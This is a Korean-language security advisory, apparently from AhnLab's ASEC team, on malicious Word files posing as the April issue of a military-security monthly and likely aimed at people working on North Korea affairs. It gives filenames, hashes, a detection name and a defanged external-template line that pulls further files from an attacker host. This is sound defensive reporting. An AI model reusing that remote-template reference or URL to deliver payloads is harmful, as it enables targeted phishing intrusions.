군사안보 월간지(4월호) 위장한 악성 워드문서 유포 중

ASEC 분석팀은 지난 3월 22일, 대북관련 내용을 포함하고 있는 악성 DOC(워드) 문서에 대해 소개하였다. 해당 유형은 문서 내부 XML 파일에 작성된 “외부 External 연결 주소” 로 접속하여 추가 파일을 다운로드 받는 구조이다.

최근 해당 방식을 이용한 악성 워드문서가 유포 중임을 포착하였으며, 군사안보 월간지 (4월호) 를 위장하였다. 현재 유포 중인 파일명은 아래와 같다.

  • 월간KIMA2021_4월호군사안보0330.docx
  • 월간KIMA2021_4월호군사안보0331.docx

문서 파일은 실행 시 본문 내용이 보호되어 있는 상태이며, 보호 해제 시 다음과 같은 본문 내용을 확인할 수 있다.

월간지를 위장한 본문 내용 (1)
월간지를 위장한 본문 내용 (2)

해당 문서에서 접속하는 악성 External 주소는 아래와 같다.

  • Target=”hxxp://beilksa.scienceontheweb.net/cookie/select/log/tmp?q=6″ TargetMode=”External”/>

확인된 2개의 워드 문서 속성에서 확인 가능한 수정 날짜와 만든이 정보는 아래와 같다.

실제 정상적으로 배포된 문서는 아래의 그림과 같이 PDF 형태로 제공되고 있는 것을 확인할 수 있다.

PDF 형식으로 유포 중인 정상 문서

최근 대북과 관련된 문서 내용을 포함하고 있는 악성 워드 문서가 다수 유포 중이며, 북한 관련 업무를 수행하는 수신자에게 보내졌을 가능성이 매우 크다. 스팸 메일을 통한 사회공학적 기법의 공격이 다수 증가한 만큼 사용자들은 이러한 공격에 피해가 발생하지 않도록 주의를 기울여야 한다.

현재 V3 제품에서는 해당 파일에 대해 아래와 같이 진단하고 있다.

[파일 진단]

  • Downloader/DOC.External (2021.04.03.00)

[IOC]

  • 월간KIMA2021_4월호군사안보0331.docx (md5: fe4dd316363d3631c83c2995dd3775f4)
  • 월간KIMA2021_4월호군사안보0330.docx (md5: 609c2473571bf703ce985b6e44b8e343)
  • hxxp://beilksa.scienceontheweb.net/cookie/select/log/tmp?q=6

[관련 블로그]

4.2 5 votes
별점 주기
guest

0 댓글
Inline Feedbacks
View all comments